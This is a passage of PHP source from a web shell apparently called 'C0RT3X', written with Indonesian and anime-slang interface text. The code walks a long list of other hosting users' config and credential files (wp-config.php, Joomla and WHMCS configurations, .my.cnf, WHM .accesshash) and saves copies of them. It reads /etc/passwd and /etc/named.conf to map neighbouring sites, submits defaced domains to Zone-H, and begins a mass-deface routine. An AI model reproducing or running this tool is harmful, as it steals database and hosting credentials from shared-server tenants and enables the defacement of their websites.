					"/home1/$user_C0RT3X/public_html/Portal/configuration.php" => "JoomlaPortal",					
					"/home1/$user_C0RT3X/public_html/wp-config.php" => "WordPress",
					"/home1/$user_C0RT3X/public_html/wordpress/wp-config.php" => "WordPressWordpress",
					"/home1/$user_C0RT3X/public_html/Wordpress/wp-config.php" => "WordPressWordpress",
					"/home1/$user_C0RT3X/public_html/WORDPRESS/wp-config.php" => "WordPressWordpress",		
					"/home1/$user_C0RT3X/public_html/Home/wp-config.php" => "WordPressHome",
					"/home1/$user_C0RT3X/public_html/HOME/wp-config.php" => "WordPressHome",
					"/home1/$user_C0RT3X/public_html/home/wp-config.php" => "WordPressHome",
					"/home1/$user_C0RT3X/public_html/NEW/wp-config.php" => "WordPressNew",
					"/home1/$user_C0RT3X/public_html/New/wp-config.php" => "WordPressNew",
					"/home1/$user_C0RT3X/public_html/new/wp-config.php" => "WordPressNew",
					"/home1/$user_C0RT3X/public_html/News/wp-config.php" => "WordPressNews",
					"/home1/$user_C0RT3X/public_html/NEWS/wp-config.php" => "WordPressNews",
					"/home1/$user_C0RT3X/public_html/news/wp-config.php" => "WordPressNews",
					"/home1/$user_C0RT3X/public_html/Cms/wp-config.php" => "WordPressCms",
					"/home1/$user_C0RT3X/public_html/CMS/wp-config.php" => "WordPressCms",
					"/home1/$user_C0RT3X/public_html/cms/wp-config.php" => "WordPressCms",
					"/home1/$user_C0RT3X/public_html/Main/wp-config.php" => "WordPressMain",
					"/home1/$user_C0RT3X/public_html/MAIN/wp-config.php" => "WordPressMain",
					"/home1/$user_C0RT3X/public_html/main/wp-config.php" => "WordPressMain",
					"/home1/$user_C0RT3X/public_html/Blog/wp-config.php" => "WordPressBlog",
					"/home1/$user_C0RT3X/public_html/BLOG/wp-config.php" => "WordPressBlog",
					"/home1/$user_C0RT3X/public_html/blog/wp-config.php" => "WordPressBlog",
					"/home1/$user_C0RT3X/public_html/Blogs/wp-config.php" => "WordPressBlogs",
					"/home1/$user_C0RT3X/public_html/BLOGS/wp-config.php" => "WordPressBlogs",
					"/home1/$user_C0RT3X/public_html/blogs/wp-config.php" => "WordPressBlogs",
					"/home1/$user_C0RT3X/public_html/beta/wp-config.php" => "WordPressBeta",
					"/home1/$user_C0RT3X/public_html/Beta/wp-config.php" => "WordPressBeta",
					"/home1/$user_C0RT3X/public_html/BETA/wp-config.php" => "WordPressBeta",
					"/home1/$user_C0RT3X/public_html/PRESS/wp-config.php" => "WordPressPress",
					"/home1/$user_C0RT3X/public_html/Press/wp-config.php" => "WordPressPress",
					"/home1/$user_C0RT3X/public_html/press/wp-config.php" => "WordPressPress",
					"/home1/$user_C0RT3X/public_html/Wp/wp-config.php" => "WordPressWp",
					"/home1/$user_C0RT3X/public_html/wp/wp-config.php" => "WordPressWp",
					"/home1/$user_C0RT3X/public_html/WP/wp-config.php" => "WordPressWP",
					"/home1/$user_C0RT3X/public_html/portal/wp-config.php" => "WordPressPortal",
					"/home1/$user_C0RT3X/public_html/PORTAL/wp-config.php" => "WordPressPortal",
					"/home1/$user_C0RT3X/public_html/Portal/wp-config.php" => "WordPressPortal",
					"/home4/$user_C0RT3X/.my.cnf" => "cpanel",
					"/home4/$user_C0RT3X/.accesshash" => "WHM-accesshash",
					"/home4/$user_C0RT3X/public_html/bw-configs/config.ini" => "BosWeb",
					"/home4/$user_C0RT3X/public_html/config/koneksi.php" => "Lokomedia",
					"/home4/$user_C0RT3X/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
					"/home4/$user_C0RT3X/public_html/clientarea/configuration.php" => "WHMCS",				
					"/home4/$user_C0RT3X/public_html/whmcs/configuration.php" => "WHMCS",
					"/home4/$user_C0RT3X/public_html/forum/config.php" => "phpBB",
					"/home4/$user_C0RT3X/public_html/sites/default/settings.php" => "Drupal",
					"/home4/$user_C0RT3X/public_html/config/settings.inc.php" => "PrestaShop",
					"/home4/$user_C0RT3X/public_html/app/etc/local.xml" => "Magento",
					"/home4/$user_C0RT3X/public_html/admin/config.php" => "OpenCart",
					"/home4/$user_C0RT3X/public_html/slconfig.php" => "Sitelok",
					"/home4/$user_C0RT3X/public_html/application/config/database.php" => "Ellislab",					
					"/home4/$user_C0RT3X/public_html/whm/configuration.php" => "WHMCS",
					"/home4/$user_C0RT3X/public_html/whmc/WHM/configuration.ph" => "WHMC",
					"/home4/$user_C0RT3X/public_html/central/configuration.php" => "WHM Central",
					"/home4/$user_C0RT3X/public_html/whm/WHMCS/configuration.php" => "WHMCS",
					"/home4/$user_C0RT3X/public_html/whm/whmcs/configuration.php" => "WHMCS",
					"/home4/$user_C0RT3X/public_html/submitticket.php" => "WHMCS",										
					"/home4/$user_C0RT3X/public_html/configuration.php" => "Joomla",					
					"/home4/$user_C0RT3X/public_html/Joomla/configuration.php" => "JoomlaJoomla",
					"/home4/$user_C0RT3X/public_html/joomla/configuration.php" => "JoomlaJoomla",
					"/home4/$user_C0RT3X/public_html/JOOMLA/configuration.php" => "JoomlaJoomla",		
					"/home4/$user_C0RT3X/public_html/Home/configuration.php" => "JoomlaHome",
					"/home4/$user_C0RT3X/public_html/HOME/configuration.php" => "JoomlaHome",
					"/home4/$user_C0RT3X/public_html/home/configuration.php" => "JoomlaHome",
					"/home4/$user_C0RT3X/public_html/NEW/configuration.php" => "JoomlaNew",
					"/home4/$user_C0RT3X/public_html/New/configuration.php" => "JoomlaNew",
					"/home4/$user_C0RT3X/public_html/new/configuration.php" => "JoomlaNew",
					"/home4/$user_C0RT3X/public_html/News/configuration.php" => "JoomlaNews",
					"/home4/$user_C0RT3X/public_html/NEWS/configuration.php" => "JoomlaNews",
					"/home4/$user_C0RT3X/public_html/news/configuration.php" => "JoomlaNews",
					"/home4/$user_C0RT3X/public_html/Cms/configuration.php" => "JoomlaCms",
					"/home4/$user_C0RT3X/public_html/CMS/configuration.php" => "JoomlaCms",
					"/home4/$user_C0RT3X/public_html/cms/configuration.php" => "JoomlaCms",
					"/home4/$user_C0RT3X/public_html/Main/configuration.php" => "JoomlaMain",
					"/home4/$user_C0RT3X/public_html/MAIN/configuration.php" => "JoomlaMain",
					"/home4/$user_C0RT3X/public_html/main/configuration.php" => "JoomlaMain",
					"/home4/$user_C0RT3X/public_html/Blog/configuration.php" => "JoomlaBlog",
					"/home4/$user_C0RT3X/public_html/BLOG/configuration.php" => "JoomlaBlog",
					"/home4/$user_C0RT3X/public_html/blog/configuration.php" => "JoomlaBlog",
					"/home4/$user_C0RT3X/public_html/Blogs/configuration.php" => "JoomlaBlogs",
					"/home4/$user_C0RT3X/public_html/BLOGS/configuration.php" => "JoomlaBlogs",
					"/home4/$user_C0RT3X/public_html/blogs/configuration.php" => "JoomlaBlogs",
					"/home4/$user_C0RT3X/public_html/beta/configuration.php" => "JoomlaBeta",
					"/home4/$user_C0RT3X/public_html/Beta/configuration.php" => "JoomlaBeta",
					"/home4/$user_C0RT3X/public_html/BETA/configuration.php" => "JoomlaBeta",
					"/home4/$user_C0RT3X/public_html/PRESS/configuration.php" => "JoomlaPress",
					"/home4/$user_C0RT3X/public_html/Press/configuration.php" => "JoomlaPress",
					"/home4/$user_C0RT3X/public_html/press/configuration.php" => "JoomlaPress",
					"/home4/$user_C0RT3X/public_html/Wp/configuration.php" => "JoomlaWp",
					"/home4/$user_C0RT3X/public_html/wp/configuration.php" => "JoomlaWp",
					"/home4/$user_C0RT3X/public_html/WP/configuration.php" => "JoomlaWP",
					"/home4/$user_C0RT3X/public_html/portal/configuration.php" => "JoomlaPortal",
					"/home4/$user_C0RT3X/public_html/PORTAL/configuration.php" => "JoomlaPortal",
					"/home4/$user_C0RT3X/public_html/Portal/configuration.php" => "JoomlaPortal",					
					"/home4/$user_C0RT3X/public_html/wp-config.php" => "WordPress",
					"/home4/$user_C0RT3X/public_html/wordpress/wp-config.php" => "WordPressWordpress",
					"/home4/$user_C0RT3X/public_html/Wordpress/wp-config.php" => "WordPressWordpress",
					"/home4/$user_C0RT3X/public_html/WORDPRESS/wp-config.php" => "WordPressWordpress",		
					"/home4/$user_C0RT3X/public_html/Home/wp-config.php" => "WordPressHome",
					"/home4/$user_C0RT3X/public_html/HOME/wp-config.php" => "WordPressHome",
					"/home4/$user_C0RT3X/public_html/home/wp-config.php" => "WordPressHome",
					"/home4/$user_C0RT3X/public_html/NEW/wp-config.php" => "WordPressNew",
					"/home4/$user_C0RT3X/public_html/New/wp-config.php" => "WordPressNew",
					"/home4/$user_C0RT3X/public_html/new/wp-config.php" => "WordPressNew",
					"/home4/$user_C0RT3X/public_html/News/wp-config.php" => "WordPressNews",
					"/home4/$user_C0RT3X/public_html/NEWS/wp-config.php" => "WordPressNews",
					"/home4/$user_C0RT3X/public_html/news/wp-config.php" => "WordPressNews",
					"/home4/$user_C0RT3X/public_html/Cms/wp-config.php" => "WordPressCms",
					"/home4/$user_C0RT3X/public_html/CMS/wp-config.php" => "WordPressCms",
					"/home4/$user_C0RT3X/public_html/cms/wp-config.php" => "WordPressCms",
					"/home4/$user_C0RT3X/public_html/Main/wp-config.php" => "WordPressMain",
					"/home4/$user_C0RT3X/public_html/MAIN/wp-config.php" => "WordPressMain",
					"/home4/$user_C0RT3X/public_html/main/wp-config.php" => "WordPressMain",
					"/home4/$user_C0RT3X/public_html/Blog/wp-config.php" => "WordPressBlog",
					"/home4/$user_C0RT3X/public_html/BLOG/wp-config.php" => "WordPressBlog",
					"/home4/$user_C0RT3X/public_html/blog/wp-config.php" => "WordPressBlog",
					"/home4/$user_C0RT3X/public_html/Blogs/wp-config.php" => "WordPressBlogs",
					"/home4/$user_C0RT3X/public_html/BLOGS/wp-config.php" => "WordPressBlogs",
					"/home4/$user_C0RT3X/public_html/blogs/wp-config.php" => "WordPressBlogs",
					"/home4/$user_C0RT3X/public_html/beta/wp-config.php" => "WordPressBeta",
					"/home4/$user_C0RT3X/public_html/Beta/wp-config.php" => "WordPressBeta",
					"/home4/$user_C0RT3X/public_html/BETA/wp-config.php" => "WordPressBeta",
					"/home4/$user_C0RT3X/public_html/PRESS/wp-config.php" => "WordPressPress",
					"/home4/$user_C0RT3X/public_html/Press/wp-config.php" => "WordPressPress",
					"/home4/$user_C0RT3X/public_html/press/wp-config.php" => "WordPressPress",
					"/home4/$user_C0RT3X/public_html/Wp/wp-config.php" => "WordPressWp",
					"/home4/$user_C0RT3X/public_html/wp/wp-config.php" => "WordPressWp",
					"/home4/$user_C0RT3X/public_html/WP/wp-config.php" => "WordPressWP",
					"/home4/$user_C0RT3X/public_html/portal/wp-config.php" => "WordPressPortal",
					"/home4/$user_C0RT3X/public_html/PORTAL/wp-config.php" => "WordPressPortal",
					"/home4/$user_C0RT3X/public_html/Portal/wp-config.php" => "WordPressPortal",					
										"/home2/$user_C0RT3X/.my.cnf" => "cpanel",
					"/home2/$user_C0RT3X/.accesshash" => "WHM-accesshash",
					"/home2/$user_C0RT3X/public_html/bw-configs/config.ini" => "BosWeb",
					"/home2/$user_C0RT3X/public_html/config/koneksi.php" => "Lokomedia",
					"/home2/$user_C0RT3X/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
					"/home2/$user_C0RT3X/public_html/clientarea/configuration.php" => "WHMCS",				
					"/home2/$user_C0RT3X/public_html/whmcs/configuration.php" => "WHMCS",
					"/home2/$user_C0RT3X/public_html/forum/config.php" => "phpBB",
					"/home2/$user_C0RT3X/public_html/sites/default/settings.php" => "Drupal",
					"/home2/$user_C0RT3X/public_html/config/settings.inc.php" => "PrestaShop",
					"/home2/$user_C0RT3X/public_html/app/etc/local.xml" => "Magento",
					"/home2/$user_C0RT3X/public_html/admin/config.php" => "OpenCart",
					"/home2/$user_C0RT3X/public_html/slconfig.php" => "Sitelok",
					"/home2/$user_C0RT3X/public_html/application/config/database.php" => "Ellislab",					
					"/home2/$user_C0RT3X/public_html/whm/configuration.php" => "WHMCS",
					"/home2/$user_C0RT3X/public_html/whmc/WHM/configuration.ph" => "WHMC",
					"/home2/$user_C0RT3X/public_html/central/configuration.php" => "WHM Central",
					"/home2/$user_C0RT3X/public_html/whm/WHMCS/configuration.php" => "WHMCS",
					"/home2/$user_C0RT3X/public_html/whm/whmcs/configuration.php" => "WHMCS",
					"/home2/$user_C0RT3X/public_html/submitticket.php" => "WHMCS",										
					"/home2/$user_C0RT3X/public_html/configuration.php" => "Joomla",					
					"/home2/$user_C0RT3X/public_html/Joomla/configuration.php" => "JoomlaJoomla",
					"/home2/$user_C0RT3X/public_html/joomla/configuration.php" => "JoomlaJoomla",
					"/home2/$user_C0RT3X/public_html/JOOMLA/configuration.php" => "JoomlaJoomla",		
					"/home2/$user_C0RT3X/public_html/Home/configuration.php" => "JoomlaHome",
					"/home2/$user_C0RT3X/public_html/HOME/configuration.php" => "JoomlaHome",
					"/home2/$user_C0RT3X/public_html/home/configuration.php" => "JoomlaHome",
					"/home2/$user_C0RT3X/public_html/NEW/configuration.php" => "JoomlaNew",
					"/home2/$user_C0RT3X/public_html/New/configuration.php" => "JoomlaNew",
					"/home2/$user_C0RT3X/public_html/new/configuration.php" => "JoomlaNew",
					"/home2/$user_C0RT3X/public_html/News/configuration.php" => "JoomlaNews",
					"/home2/$user_C0RT3X/public_html/NEWS/configuration.php" => "JoomlaNews",
					"/home2/$user_C0RT3X/public_html/news/configuration.php" => "JoomlaNews",
					"/home2/$user_C0RT3X/public_html/Cms/configuration.php" => "JoomlaCms",
					"/home2/$user_C0RT3X/public_html/CMS/configuration.php" => "JoomlaCms",
					"/home2/$user_C0RT3X/public_html/cms/configuration.php" => "JoomlaCms",
					"/home2/$user_C0RT3X/public_html/Main/configuration.php" => "JoomlaMain",
					"/home2/$user_C0RT3X/public_html/MAIN/configuration.php" => "JoomlaMain",
					"/home2/$user_C0RT3X/public_html/main/configuration.php" => "JoomlaMain",
					"/home2/$user_C0RT3X/public_html/Blog/configuration.php" => "JoomlaBlog",
					"/home2/$user_C0RT3X/public_html/BLOG/configuration.php" => "JoomlaBlog",
					"/home2/$user_C0RT3X/public_html/blog/configuration.php" => "JoomlaBlog",
					"/home2/$user_C0RT3X/public_html/Blogs/configuration.php" => "JoomlaBlogs",
					"/home2/$user_C0RT3X/public_html/BLOGS/configuration.php" => "JoomlaBlogs",
					"/home2/$user_C0RT3X/public_html/blogs/configuration.php" => "JoomlaBlogs",
					"/home2/$user_C0RT3X/public_html/beta/configuration.php" => "JoomlaBeta",
					"/home2/$user_C0RT3X/public_html/Beta/configuration.php" => "JoomlaBeta",
					"/home2/$user_C0RT3X/public_html/BETA/configuration.php" => "JoomlaBeta",
					"/home2/$user_C0RT3X/public_html/PRESS/configuration.php" => "JoomlaPress",
					"/home2/$user_C0RT3X/public_html/Press/configuration.php" => "JoomlaPress",
					"/home2/$user_C0RT3X/public_html/press/configuration.php" => "JoomlaPress",
					"/home2/$user_C0RT3X/public_html/Wp/configuration.php" => "JoomlaWp",
					"/home2/$user_C0RT3X/public_html/wp/configuration.php" => "JoomlaWp",
					"/home2/$user_C0RT3X/public_html/WP/configuration.php" => "JoomlaWP",
					"/home2/$user_C0RT3X/public_html/portal/configuration.php" => "JoomlaPortal",
					"/home2/$user_C0RT3X/public_html/PORTAL/configuration.php" => "JoomlaPortal",
					"/home2/$user_C0RT3X/public_html/Portal/configuration.php" => "JoomlaPortal",					
					"/home2/$user_C0RT3X/public_html/wp-config.php" => "WordPress",
					"/home2/$user_C0RT3X/public_html/wordpress/wp-config.php" => "WordPressWordpress",
					"/home2/$user_C0RT3X/public_html/Wordpress/wp-config.php" => "WordPressWordpress",
					"/home2/$user_C0RT3X/public_html/WORDPRESS/wp-config.php" => "WordPressWordpress",		
					"/home2/$user_C0RT3X/public_html/Home/wp-config.php" => "WordPressHome",
					"/home2/$user_C0RT3X/public_html/HOME/wp-config.php" => "WordPressHome",
					"/home2/$user_C0RT3X/public_html/home/wp-config.php" => "WordPressHome",
					"/home2/$user_C0RT3X/public_html/NEW/wp-config.php" => "WordPressNew",
					"/home2/$user_C0RT3X/public_html/New/wp-config.php" => "WordPressNew",
					"/home2/$user_C0RT3X/public_html/new/wp-config.php" => "WordPressNew",
					"/home2/$user_C0RT3X/public_html/News/wp-config.php" => "WordPressNews",
					"/home2/$user_C0RT3X/public_html/NEWS/wp-config.php" => "WordPressNews",
					"/home2/$user_C0RT3X/public_html/news/wp-config.php" => "WordPressNews",
					"/home2/$user_C0RT3X/public_html/Cms/wp-config.php" => "WordPressCms",
					"/home2/$user_C0RT3X/public_html/CMS/wp-config.php" => "WordPressCms",
					"/home2/$user_C0RT3X/public_html/cms/wp-config.php" => "WordPressCms",
					"/home2/$user_C0RT3X/public_html/Main/wp-config.php" => "WordPressMain",
					"/home2/$user_C0RT3X/public_html/MAIN/wp-config.php" => "WordPressMain",
					"/home2/$user_C0RT3X/public_html/main/wp-config.php" => "WordPressMain",
					"/home2/$user_C0RT3X/public_html/Blog/wp-config.php" => "WordPressBlog",
					"/home2/$user_C0RT3X/public_html/BLOG/wp-config.php" => "WordPressBlog",
					"/home2/$user_C0RT3X/public_html/blog/wp-config.php" => "WordPressBlog",
					"/home2/$user_C0RT3X/public_html/Blogs/wp-config.php" => "WordPressBlogs",
					"/home2/$user_C0RT3X/public_html/BLOGS/wp-config.php" => "WordPressBlogs",
					"/home2/$user_C0RT3X/public_html/blogs/wp-config.php" => "WordPressBlogs",
					"/home2/$user_C0RT3X/public_html/beta/wp-config.php" => "WordPressBeta",
					"/home2/$user_C0RT3X/public_html/Beta/wp-config.php" => "WordPressBeta",
					"/home2/$user_C0RT3X/public_html/BETA/wp-config.php" => "WordPressBeta",
					"/home2/$user_C0RT3X/public_html/PRESS/wp-config.php" => "WordPressPress",
					"/home2/$user_C0RT3X/public_html/Press/wp-config.php" => "WordPressPress",
					"/home2/$user_C0RT3X/public_html/press/wp-config.php" => "WordPressPress",
					"/home2/$user_C0RT3X/public_html/Wp/wp-config.php" => "WordPressWp",
					"/home2/$user_C0RT3X/public_html/wp/wp-config.php" => "WordPressWp",
					"/home2/$user_C0RT3X/public_html/WP/wp-config.php" => "WordPressWP",
					"/home2/$user_C0RT3X/public_html/portal/wp-config.php" => "WordPressPortal",
					"/home2/$user_C0RT3X/public_html/PORTAL/wp-config.php" => "WordPressPortal",
					"/home2/$user_C0RT3X/public_html/Portal/wp-config.php" => "WordPressPortal",
					"/home3/$user_C0RT3X/.my.cnf" => "cpanel",
					"/home3/$user_C0RT3X/.accesshash" => "WHM-accesshash",
					"/home3/$user_C0RT3X/public_html/bw-configs/config.ini" => "BosWeb",
					"/home3/$user_C0RT3X/public_html/config/koneksi.php" => "Lokomedia",
					"/home3/$user_C0RT3X/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
					"/home3/$user_C0RT3X/public_html/clientarea/configuration.php" => "WHMCS",				
					"/home3/$user_C0RT3X/public_html/whmcs/configuration.php" => "WHMCS",
					"/home3/$user_C0RT3X/public_html/forum/config.php" => "phpBB",
					"/home3/$user_C0RT3X/public_html/sites/default/settings.php" => "Drupal",
					"/home3/$user_C0RT3X/public_html/config/settings.inc.php" => "PrestaShop",
					"/home3/$user_C0RT3X/public_html/app/etc/local.xml" => "Magento",
					"/home3/$user_C0RT3X/public_html/admin/config.php" => "OpenCart",
					"/home3/$user_C0RT3X/public_html/slconfig.php" => "Sitelok",
					"/home3/$user_C0RT3X/public_html/application/config/database.php" => "Ellislab",					
					"/home3/$user_C0RT3X/public_html/whm/configuration.php" => "WHMCS",
					"/home3/$user_C0RT3X/public_html/whmc/WHM/configuration.ph" => "WHMC",
					"/home3/$user_C0RT3X/public_html/central/configuration.php" => "WHM Central",
					"/home3/$user_C0RT3X/public_html/whm/WHMCS/configuration.php" => "WHMCS",
					"/home3/$user_C0RT3X/public_html/whm/whmcs/configuration.php" => "WHMCS",
					"/home3/$user_C0RT3X/public_html/submitticket.php" => "WHMCS",										
					"/home3/$user_C0RT3X/public_html/configuration.php" => "Joomla",					
					"/home3/$user_C0RT3X/public_html/Joomla/configuration.php" => "JoomlaJoomla",
					"/home3/$user_C0RT3X/public_html/joomla/configuration.php" => "JoomlaJoomla",
					"/home3/$user_C0RT3X/public_html/JOOMLA/configuration.php" => "JoomlaJoomla",		
					"/home3/$user_C0RT3X/public_html/Home/configuration.php" => "JoomlaHome",
					"/home3/$user_C0RT3X/public_html/HOME/configuration.php" => "JoomlaHome",
					"/home3/$user_C0RT3X/public_html/home/configuration.php" => "JoomlaHome",
					"/home3/$user_C0RT3X/public_html/NEW/configuration.php" => "JoomlaNew",
					"/home3/$user_C0RT3X/public_html/New/configuration.php" => "JoomlaNew",
					"/home3/$user_C0RT3X/public_html/new/configuration.php" => "JoomlaNew",
					"/home3/$user_C0RT3X/public_html/News/configuration.php" => "JoomlaNews",
					"/home3/$user_C0RT3X/public_html/NEWS/configuration.php" => "JoomlaNews",
					"/home3/$user_C0RT3X/public_html/news/configuration.php" => "JoomlaNews",
					"/home3/$user_C0RT3X/public_html/Cms/configuration.php" => "JoomlaCms",
					"/home3/$user_C0RT3X/public_html/CMS/configuration.php" => "JoomlaCms",
					"/home3/$user_C0RT3X/public_html/cms/configuration.php" => "JoomlaCms",
					"/home3/$user_C0RT3X/public_html/Main/configuration.php" => "JoomlaMain",
					"/home3/$user_C0RT3X/public_html/MAIN/configuration.php" => "JoomlaMain",
					"/home3/$user_C0RT3X/public_html/main/configuration.php" => "JoomlaMain",
					"/home3/$user_C0RT3X/public_html/Blog/configuration.php" => "JoomlaBlog",
					"/home3/$user_C0RT3X/public_html/BLOG/configuration.php" => "JoomlaBlog",
					"/home3/$user_C0RT3X/public_html/blog/configuration.php" => "JoomlaBlog",
					"/home3/$user_C0RT3X/public_html/Blogs/configuration.php" => "JoomlaBlogs",
					"/home3/$user_C0RT3X/public_html/BLOGS/configuration.php" => "JoomlaBlogs",
					"/home3/$user_C0RT3X/public_html/blogs/configuration.php" => "JoomlaBlogs",
					"/home3/$user_C0RT3X/public_html/beta/configuration.php" => "JoomlaBeta",
					"/home3/$user_C0RT3X/public_html/Beta/configuration.php" => "JoomlaBeta",
					"/home3/$user_C0RT3X/public_html/BETA/configuration.php" => "JoomlaBeta",
					"/home3/$user_C0RT3X/public_html/PRESS/configuration.php" => "JoomlaPress",
					"/home3/$user_C0RT3X/public_html/Press/configuration.php" => "JoomlaPress",
					"/home3/$user_C0RT3X/public_html/press/configuration.php" => "JoomlaPress",
					"/home3/$user_C0RT3X/public_html/Wp/configuration.php" => "JoomlaWp",
					"/home3/$user_C0RT3X/public_html/wp/configuration.php" => "JoomlaWp",
					"/home3/$user_C0RT3X/public_html/WP/configuration.php" => "JoomlaWP",
					"/home3/$user_C0RT3X/public_html/portal/configuration.php" => "JoomlaPortal",
					"/home3/$user_C0RT3X/public_html/PORTAL/configuration.php" => "JoomlaPortal",
					"/home3/$user_C0RT3X/public_html/Portal/configuration.php" => "JoomlaPortal",					
					"/home3/$user_C0RT3X/public_html/wp-config.php" => "WordPress",
					"/home3/$user_C0RT3X/public_html/wordpress/wp-config.php" => "WordPressWordpress",
					"/home3/$user_C0RT3X/public_html/Wordpress/wp-config.php" => "WordPressWordpress",
					"/home3/$user_C0RT3X/public_html/WORDPRESS/wp-config.php" => "WordPressWordpress",		
					"/home3/$user_C0RT3X/public_html/Home/wp-config.php" => "WordPressHome",
					"/home3/$user_C0RT3X/public_html/HOME/wp-config.php" => "WordPressHome",
					"/home3/$user_C0RT3X/public_html/home/wp-config.php" => "WordPressHome",
					"/home3/$user_C0RT3X/public_html/NEW/wp-config.php" => "WordPressNew",
					"/home3/$user_C0RT3X/public_html/New/wp-config.php" => "WordPressNew",
					"/home3/$user_C0RT3X/public_html/new/wp-config.php" => "WordPressNew",
					"/home3/$user_C0RT3X/public_html/News/wp-config.php" => "WordPressNews",
					"/home3/$user_C0RT3X/public_html/NEWS/wp-config.php" => "WordPressNews",
					"/home3/$user_C0RT3X/public_html/news/wp-config.php" => "WordPressNews",
					"/home3/$user_C0RT3X/public_html/Cms/wp-config.php" => "WordPressCms",
					"/home3/$user_C0RT3X/public_html/CMS/wp-config.php" => "WordPressCms",
					"/home3/$user_C0RT3X/public_html/cms/wp-config.php" => "WordPressCms",
					"/home3/$user_C0RT3X/public_html/Main/wp-config.php" => "WordPressMain",
					"/home3/$user_C0RT3X/public_html/MAIN/wp-config.php" => "WordPressMain",
					"/home3/$user_C0RT3X/public_html/main/wp-config.php" => "WordPressMain",
					"/home3/$user_C0RT3X/public_html/Blog/wp-config.php" => "WordPressBlog",
					"/home3/$user_C0RT3X/public_html/BLOG/wp-config.php" => "WordPressBlog",
					"/home3/$user_C0RT3X/public_html/blog/wp-config.php" => "WordPressBlog",
					"/home3/$user_C0RT3X/public_html/Blogs/wp-config.php" => "WordPressBlogs",
					"/home3/$user_C0RT3X/public_html/BLOGS/wp-config.php" => "WordPressBlogs",
					"/home3/$user_C0RT3X/public_html/blogs/wp-config.php" => "WordPressBlogs",
					"/home3/$user_C0RT3X/public_html/beta/wp-config.php" => "WordPressBeta",
					"/home3/$user_C0RT3X/public_html/Beta/wp-config.php" => "WordPressBeta",
					"/home3/$user_C0RT3X/public_html/BETA/wp-config.php" => "WordPressBeta",
					"/home3/$user_C0RT3X/public_html/PRESS/wp-config.php" => "WordPressPress",
					"/home3/$user_C0RT3X/public_html/Press/wp-config.php" => "WordPressPress",
					"/home3/$user_C0RT3X/public_html/press/wp-config.php" => "WordPressPress",
					"/home3/$user_C0RT3X/public_html/Wp/wp-config.php" => "WordPressWp",
					"/home3/$user_C0RT3X/public_html/wp/wp-config.php" => "WordPressWp",
					"/home3/$user_C0RT3X/public_html/WP/wp-config.php" => "WordPressWP",
					"/home3/$user_C0RT3X/public_html/portal/wp-config.php" => "WordPressPortal",
					"/home3/$user_C0RT3X/public_html/PORTAL/wp-config.php" => "WordPressPortal",
					"/home3/$user_C0RT3X/public_html/Portal/wp-config.php" => "WordPressPortal"					
						);	
                    foreach($grab_config as $config => $nama_config) {
                        $ambil_config = file_get_contents($config);
                        if($ambil_config == '') {
                        } else {
                            $file_config = fopen("C0RT3X_config/$user_C0RT3X-$nama_config.txt","w");
                            fputs($file_config,$ambil_config);
                        }
                    }
                }      
            }
        }  
    }
    echo "<center><a href='?'><font color='#f1284e'>Done</font></a></center>";
    } elseif(isset($_GET['jumping']) == 'jumping') {
	$i = 0;
	echo "<pre><div class='margin: 5px auto;'>";
	$etc = fopen("/etc/passwd", "r");
	while($passwd = fgets($etc)) {
		if($passwd == '' || !$etc) {
			echo "<font color=red>Can't read /etc/passwd</font>";
		} else {
			preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
			foreach($user_jumping[1] as $user_c0rt3x_jump) {
				$user_jumping_dir = "/home/$user_c0rt3x_jump/public_html";
				if(is_readable($user_jumping_dir)) {
					$i++;
					$jrw = "[<font color=lime>R</font>] <a href='?path=$user_jumping_dir'><font color=#ffffff>$user_jumping_dir</font></a><br>";
					if(is_writable($user_jumping_dir)) {
						$jrw = "[<font color='#02BC8C'>RW</font>] <a href='?path=$user_jumping_dir'><font color=#ffffff>$user_jumping_dir</font></a><br>";
					}
					echo $jrw;
					$domain_jump = file_get_contents("/etc/named.conf");	
					if($domain_jump == '') {
						echo " => ( <font color=red>gomene senpai, domainya gak bisa di ambil:(</font> )<br>";
					} else {
						preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
						foreach($domains_jump[1] as $dj) {
							$user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
							$user_jumping_url = $user_jumping_url['name'];
							if($user_jumping_url == $user_c0rt3x_jump) {
								echo " => ( <u>$dj</u> )<br>";
								break;
							}
						}
					}
				}
			}
		}
	}
	if($i == 0) { 
	} else {
		echo "<br>Total ada ".$i." cewek kawaii di ".gethostbyname($_SERVER['HTTP_HOST'])."";
	}
	echo "</div></pre>";
}elseif(isset($_GET['zoneh']) == 'zoneh') {
	if($_POST['submit']) {
		$domain = explode("\r\n", $_POST['url']);
		$nick =  $_POST['nick'];
		echo "Onhold: <a href='http://www.zone-h.org/archive/notifier=$nick/published=0' target='_blank'>http://www.zone-h.org/archive/notifier=$nick/published=0</a><br>";
		echo "Archive: <a href='http://www.zone-h.org/archive/notifier=$nick' target='_blank'>http://www.zone-h.org/archive/notifier=$nick</a><br><br>";
		function zoneh($url,$nick) {
			$ch = curl_init("http://www.zone-h.com/notify/single");
				  curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
				  curl_setopt($ch, CURLOPT_POST, true);
				  curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send");
			return curl_exec($ch);
				  curl_close($ch);
		}
		foreach($domain as $url) {
			$zoneh = zoneh($url,$nick);
			if(preg_match("/color=\"red\">OK<\/font><\/li>/i", $zoneh)) {
				echo "$url -> <font color=lime>OK</font><br>";
			} else {
				echo "$url -> <font color=red>ERROR</font><br>";
			}
		}
	} else {
		echo "<center><form method='post'>
		<i class='fa fa-user'></i>&nbsp;<u>Defacer</u>: <br>
		<input type='text' name='nick' class='c0r' value='C0RT3X'><br>
		<i class='fa fa-globe'></i>&nbsp;<u>Domains</u>: <br>
		<textarea class='katsumi' name='url'></textarea><br>
		<input type='submit' name='submit' style='font-family:kelly slab;margin-top:10px;width:120px;background:transparent;color:#ffffff;border:2px solid #f1284e;border-radius:2px;' value='Gass Senpai!'>
		</form>";
	}
echo '</center>';
} elseif(isset($_GET['mass_deface']) == 'mass_deface') {
	echo "<center><form action=\"\" method=\"post\">\n";
	$index = $_POST["script"];
	$index = str_replace('"',"'",$index);
	$index = stripslashes($index);
	function edit_file($file,$index){
		if (is_writable($file)) {
		clear_fill($file,$index);
		echo "<Span style='color:#02BC8C;'><strong> Berhasil Senpai^_^ </strong></span><br></center>";
		} 
